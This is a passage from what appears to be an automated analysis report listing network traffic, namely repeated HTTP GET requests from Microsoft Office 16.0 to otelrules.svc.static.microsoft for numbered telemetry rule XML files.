              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
